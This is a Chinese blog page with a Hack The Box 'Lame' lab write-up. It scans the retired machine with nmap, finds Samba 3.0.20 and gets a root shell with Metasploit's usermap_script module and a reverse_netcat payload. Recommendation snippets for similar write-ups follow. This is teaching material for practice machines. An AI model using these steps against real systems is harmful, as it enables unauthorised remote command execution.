HTB: Lame 渗透测试

最新推荐文章于 2024-06-09 11:50:08 发布
最新推荐文章于 2024-06-09 11:50:08 发布
阅读量626 收藏 1
点赞数
文章标签: 测试工具 网络安全 web安全 系统安全 数据挖掘
原文链接:https://www.freebuf.com/articles/web/264461.html
版权

网络安全,web,Kali,渗透测试相关课件,工具,资料

可以关注公众号:“掌控安全课堂

回复:“我想学黑客”即可免费获得

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines
描述:

注:因为是已经退役的靶机所以现在的ip地址与信息卡中的并不一致。

前言

本次演练使用kali系统按照渗透测试的过程进行操作,首先对该靶机进行探测,获取端口与版本信息根据各个开放端口的版本查找相应的漏洞,并进行利用获取root权限

一、信息收集

1、靶机ip

ip地址为10.129.104.53

2、靶机端口服务

nmap -p- -A -O 10.129.104.53

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

二、漏洞探测与利用

1、漏洞扫描

通过端口扫描发现开放了445端口,使用searchsploit查询是否存在版本漏洞

searchsploit  Samba 3.0.20

发现msf中存在可以利用的脚本

2、漏洞利用

search Username map script
use exploit/multi/samba/usermap_script

根据提示需要设置payload

set payload cmd/unix/reverse_netcat

需要设置:RHOSTS、RPORT 、LHOST、LPORT(默认即可)

3、获取flag

三、总结

该靶机操作简单需要,直接使用msf中集成好的脚本即可,想要加深印象可以查看该漏洞的详细信息,有助于更好的了解

本文作者:一只xiao白, 转载请注明来自FreeBuf.COM

Askshhbs
关注
HTB Lame[Hack The Box HTB靶场]writeup系列1
重新启程
02-01 3020
首先祈祷一下SARS病情尽快过去,武汉加油!湖北加油! 为了不给国家添乱,所以我在HTB订阅了VIP,准备搞下Retired Machines的靶机。 目录 0x00 靶场介绍 0x01 扫描端口 0x02 ftp服务 0x03 smb服务 0x00 靶场介绍 我们从第一个lame开始。 如何注册账号,购买vip,网上有大把文章,这里我就不再记录了。 这个系列主要是...
HTB:Active渗透测试
MSB_WLAQ的博客
09-30 764
基础信息 简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透。 链接:https://www.hackthebox.eu/home/machines/profile/113 描述: 注:没有网络安全就没有国家安全,以巩固国家安全防护为由对于该计算机进行渗透,所有行为都是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的.
HTB-Lame
qq_53142368的博客
06-30 316
HTB
oscp——HTB—— Lame
王嘟嘟的博客
04-13 619
0x00 前言 vulnhub下载,搞环境搞的人心累,还不如试试HTB~ 难度 入门 1级 (基本没啥难度) 0x01 信息收集 常规扫端口,网太卡了,所以使用先扫常规,然后再进行定点扫描。 0x02 usershell and rootshell 我是做完之后回来写的,这里可以直接拿到两个flag 看到samba,拿msf 看一下版本 use auxiliary/scanner/smb/s...
HTB_Lame_Samba NDay
网络安全学习
02-01 120
HTB_Lame_Samba NDay
HTB:Dropzone渗透测试
MSB_WLAQ的博客
09-28 271
基础信息 简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透。 链接:https://www.hackthebox.eu/home/machines/profile/177 描述: 注:没有网络安全就没有国家安全,以巩固国家安全防护为由对于该计算机进行渗透,所有行为都是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,
vagrant-htb:HackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
HTB:堡垒系列-jet.com
m0_46391769的博客
11-01 7252
HTB:jet.com练习 信息收集 首先masscan: Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-10-31 08:05:08 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65535 ports/host] Discovered open port 80
HTB:在线主机-Omni
m0_46391769的博客
11-01 361
免责申明:本文仅用于学术讨论,请勿用作非法用途。如有,本人概不负责。 关于本人:我是一名来自测绘行业的小白,最近在想转行所以写博客。(接受实习邀请限‘成都’)为梦想前进,不留遗憾。 HTB:Omni 主机介绍,首先这是一台简单的主句如果你对Powershell有一定的了解那么移动不会觉得很难,但是Powershell对于平常一般人来说始终像天书一样。对。所以建议还是可以学习一些关于powershell的知识。 首先还是老规矩: Port Version 135 RPC 8080 HT
HTB_lame-samba cre远程
Allison_的博客
07-01 406
nmap -sC -sV 10.10.10.3 发现存在以下端口21、22、139、445端口,逐步测试后发现139smb存在漏洞 Samba服务对应的端口有139和445等,只要开启这些端口后,主机就可能存在Samba服务远程溢出漏洞 msfconsole方法 使用msfconsole中multi/samba/usermap_script模块,设置攻击目标10.10.10.3,LHOST应该是默认的,run执行后获得服务器权限,执行whoami命令发现其是root权限 得到flag 进
HTB打靶日记:Lame
m0_73998094的博客
12-25 760
HTB打靶日记:Lame
oscp——htb——Lazy
热门推荐
王嘟嘟的博客
06-29 1万+
0x00 前言 0x01 信息收集 0x02 Web
HTB靶机-Lame-WP
灰蜗牛
04-25 1096
简介:Tags:Rating: 4.4Skills:扫下IP: 1.ftp 匿名登录ftp查看一下 尝试vsftp对应的漏洞 该漏洞不存在,转向ssh和smb试着爆破一下,没发现可以利用的点。 不用MSF怎么解决呢?试试nmap的nse漏洞脚本,无果 非MSF 信息搜集,寻找历史漏洞确定Samba具体版本 关于smbclient出现NT_STATUS_CONNECTION_DISCONNECTED错误smbclient从4.11开始协议取消了nt1,使用smbv2,所以导致协议不能协商,解决办法如上,通过
htb-linux-1-lame-smb3.0.20
最新发布
admin741admin的博客
06-09 194
namp smb漏洞 搜索关键词 其他 smb Samba是在linux和unix系统上实现SMB(Server Message Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件和打印机的通信协议,它在局域网内使用linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。
hack the box lame渗透过程
nini_boom的博客
05-12 1794
hack the box就不多介绍了。直接上题 1、信息收集 端口扫描 nmap -Pn -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3 参数 作用 -Pn 如果主机禁用了ping请求,那么扫描将不能很好地进行下去。-Pn就是默认主机已经启动,并进行全套的检查工作 -sV 检查服务端的软件版本,可针对不同版本选择payload -sC...
kali渗透测试:【实验2】一次简单的渗透测试实战
qq_38975218的博客
12-05 4803
启动 Kali 容器并进入到 bash 界面里,执行 ping 操作验证网络联通性: # 启动并进入 Kali 容器里的 bash docker run -ti --network host 3f457 bash # 在 Kali 容器中测试虚拟网络连接,使用 Ctrl-C 退出 ping: ping target 在 Kali 容器的 bash 界面里运行以下命令,注意 Nmap 的参数使用: -p:指定扫描的端口范围 -T4:设定 nmap 扫描的时间策略,数字为 0-5,越大越快。扫描的越慢则越
新手教程—Samba渗透远程命令注入漏洞 username map script(CVE-2007-2447 )
星虐
01-10 2460
Smaba 远程shell命令注入 (username map script) 文章目录Smaba 远程shell命令注入 (username map script)一、漏洞描述二、漏洞利用过程二、漏洞实验步骤 一、漏洞描述 漏洞编号 CVE-2007-2447 披露时间 2007-05-14 “username map script”是Samba协议的远程命令注入执行漏洞 漏洞路径 exploit/multi/samba/usermap_script 影响版本 samba 3.0.20-3.0.25
交叉编译并测试lame
突围
06-14 5757
root@ubuntu:/home/zhangbin/project/6-14/lame-3.98.4# ./configure --prefix=/mnt/ZB --host=arm-linux  --with-picconfigure: WARNING: If you wanted to set the --build type, dont use --host.    If a
HTB攻防记:Stocker,子域探索与XSS利用
该环境主要涉及web安全、Linux系统、JavaScript(JS)以及网络安全渗透测试技能的实践。首先,通过使用Nmap工具进行网络探测,攻击者定位了目标IP地址10.129.51.243,并将其添加到hosts文件中以便更方便地访问。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值